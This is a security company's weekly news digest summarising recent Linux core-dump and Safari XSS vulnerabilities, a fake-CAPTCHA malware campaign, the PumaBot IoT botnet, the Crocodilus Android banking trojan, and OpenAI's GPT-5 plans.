Linux and Safari flaws exposed, attackers gain control of Android devices, what's next for ChatGPT?
Welcome to this week’s Security News. We’ve collated the best articles from the around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly.
Vulnerabilities and Patches
New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora
Two information disclosure flaws have been identified in apport and systemd-coredump, the core dump handlers in Ubuntu, Red Hat Enterprise Linux, and Fedora, according to the Qualys Threat Research Unit (TRU).
Tracked as CVE-2025-5054 and CVE-2025-4598, both vulnerabilities are race condition bugs that could enable a local attacker to obtain access to access sensitive information. Tools like Apport and systemd-coredump are designed to handle crash reporting and core dumps in Linux systems.
“These race conditions allow a local attacker to exploit a SUID program and gain read access to the resulting core dump,” Saeed Abbasi, manager of product at Qualys TRU, said.
A brief description of the two flaws is below –
- CVE-2025-5054 (CVSS score: 4.7) – A race condition in Canonical apport package up to and including 2.32.0 that allows a local attacker to leak sensitive information via PID-reuse by leveraging namespaces
- CVE-2025-4598 (CVSS score: 4.7) – A race condition in systemd-coredump that allows an attacker to force a SUID process to crash and replace it with a non-SUID binary to access the original’s privileged process coredump, allowing the attacker to read sensitive data, such as /etc/shadow content, loaded by the original process
SUID, short for Set User ID, is a special file permission that allows a user to execute a program with the privileges of its owner, rather than their own permissions.
“When analyzing application crashes, apport attempts to detect if the crashing process was running inside a container before performing consistency checks on it,” Canonical’s Octavio Galland said.
“This means that if a local attacker manages to induce a crash in a privileged process and quickly replaces it with another one with the same process ID that resides inside a mount and pid namespace, apport will attempt to forward the core dump (which might contain sensitive information belonging to the original, privileged process) into the namespace.”
New Safari XSS Flaw Leverages JavaScript Error Handling to Execute Arbitrary Code
A new cross-site scripting (XSS) vulnerability in Safari that exploits the browser’s TypeError exception handling mechanism to execute arbitrary JavaScript code.
The flaw, discovered during Gareth Heyes research into payload concealment techniques, demonstrates how Safari’s improper handling of quote escaping in TypeError messages can be weaponized for malicious code execution.
This vulnerability represents a significant security concern as it bypasses traditional XSS prevention mechanisms by leveraging the browser’s own error-handling infrastructure.
The vulnerability stems from Safari’s flawed handling of single and double quotes within TypeError exception messages.
When developers attempt to use the new operator on a string literal containing mixed quotes, Safari generates a TypeError that inadequately escapes quote characters within the error message.
The core issue manifests when executing code such as new ‘foo”bar’, which produces the TypeError message: “foo”bar” is not a constructor.
The critical flaw lies in Safari’s conversion process, where single quotes are transformed to double quotes, but the embedded double quote within the string remains unescaped.
This creates a scenario where the resulting error message contains three double quotes, effectively breaking the string boundary and allowing arbitrary JavaScript to be injected into the exception text.
The exploitation becomes possible because TypeErrors, unlike syntax errors, do not prevent subsequent JavaScript execution, creating a pathway for malicious code to run within the context of the error message.
Cyber Attacks
Threat Actors Exploit ‘Prove You Are Human’ Scheme To Deliver Malware
Cybersecurity researchers have uncovered a sophisticated malware campaign that weaponizes users’ trust in routine internet verification processes to deliver malicious payloads.
The scheme exploits familiar “prove you are human” prompts, transforming seemingly innocent website interactions into vectors for malware distribution across Windows systems worldwide.
The campaign employs deceptive websites that mimic legitimate services, including spoofed Gitcodes repositories and fraudulent DocuSign verification pages, to trick users into executing malicious PowerShell scripts on their machines.
Victims are manipulated into copying and pasting these scripts directly into their Windows Run prompt, initiating a cascade of automated downloads that ultimately install the NetSupport Remote Access Trojan (RAT) on infected systems.
DomainTools analysts identified this malicious multi-stage downloader campaign targeting Windows users through carefully crafted social engineering techniques.
The researchers discovered that threat actors are leveraging multiple themed websites to host PowerShell scripts designed to bypass traditional security measures through their staged approach.
The campaign represents a significant evolution in social engineering tactics, as it requires victims to actively participate in their own compromise while believing they are completing legitimate verification procedures.
The attack infrastructure demonstrates remarkable sophistication, utilizing multiple registrars including Cloudflare, NameCheap, and NameSilo, with name servers distributed across cloudflare.com, luxhost.org, and namecheaphosting.com.
This distributed approach enhances the campaign’s resilience against takedown efforts while providing attackers with multiple fallback options for payload delivery.
New Linux PumaBot Attacking IoT Devices by Brute-Forcing SSH Credentials
Cybersecurity researchers have identified a sophisticated new threat targeting the expanding Internet of Things ecosystem.
PumaBot, a Go-based Linux botnet, has emerged as a significant concern for organizations operating vulnerable IoT devices, particularly surveillance systems.
Unlike conventional malware that conducts broad internet scans, this botnet employs a more targeted and stealthy approach to compromise embedded devices running Linux operating systems.
The malware’s attack methodology centers on SSH credential brute-forcing, but with a strategic twist that sets it apart from traditional botnets.
Rather than scanning the internet indiscriminately, PumaBot retrieves curated lists of target IP addresses from command-and-control servers, enabling it to focus its efforts on specific vulnerable devices while avoiding detection mechanisms designed to identify mass scanning activities.
PolySwarm analysts identified PumaBot during recent threat research operations, noting its sophisticated evasion capabilities and targeted approach to IoT compromise.
The researchers observed that the malware demonstrates particular interest in surveillance and traffic camera systems, incorporating specific fingerprinting logic to detect devices manufactured by Pumatronix, a surveillance equipment company.
Once PumaBot successfully infiltrates a target system through compromised SSH credentials, it immediately begins establishing persistence mechanisms designed to survive system reboots and security sweeps.
The primary objective appears to be cryptocurrency mining, with researchers observing commands like “xmrig” and “networkxm” being executed on compromised devices to generate illicit profits for the operators.
The botnet’s emergence highlights the growing vulnerability of IoT ecosystems, where default credentials and poor security practices create attractive targets for cybercriminals seeking to monetize compromised computing resources.
In Other News...
New Crocodilus Malware Let Attacker Gain Full Control of Your Android Device
A sophisticated new Android banking Trojan named Crocodilus has emerged as a significant global threat, demonstrating advanced device-takeover capabilities that grant cybercriminals unprecedented control over infected smartphones.
First discovered in March 2025, this malware has rapidly evolved from localised test campaigns to a worldwide operation targeting financial institutions and cryptocurrency platforms across multiple continents.
The malware initially appeared with campaigns primarily focused on Turkey, but recent intelligence reveals an aggressive expansion strategy that now encompasses European countries including Poland and Spain, while extending its reach to South American markets.
Crocodilus employs a particularly insidious distribution method through malicious Facebook advertisements that masquerade as legitimate banking and e-commerce applications, promising users bonus rewards and promotional offers to entice downloads.
Threat Fabric analysts noted that these fraudulent advertisements operated with remarkable stealth, remaining active for only one to two hours while achieving over a thousand impressions each.
The campaigns specifically targeted users over 35 years old, strategically focusing on demographics with higher disposable income and greater likelihood of engaging with financial services.
Upon clicking download links, victims are redirected to malicious websites that deliver the Crocodilus dropper, which has been engineered to bypass Android 13+ security restrictions.
OpenAI is hopeful GPT-5 will compete a little more
OpenAI’s next foundational model is GPT-5, and the AI startup is hoping that the model will compete a little more with rivals.
Speaking at the AI Summit in Mexico, two OpenAI representatives confirmed that GPT-5 is indeed coming and that it’ll be a lot better than the existing OpenAI models.
OpenAI is still working on GPT-5 and doesn’t know how much it will cost, but it doesn’t look like it will be “that” cheap, likely referring to the existing GPT-4 model.
In addition, an OpenAI representative added that they hope to compete a little more with GPT-5 without providing details.
“We hope that with GPT-5 we will be able to compete a little more,” one of the OpenAI representatives said.
It looks like the company is referring to the competition from the new models like Gemini 2.5 Pro and Claude 4, which do better than GPT in coding.
Based on what I’ve heard, GPT-5 is still expected to ship sometime in the summer, but since we’re talking about OpenAI, plans are always subject to change.
If GPT-5 doesn’t appear to meet the internal performance goals, it may take a little longer to roll out, but for now, July is indeed the target.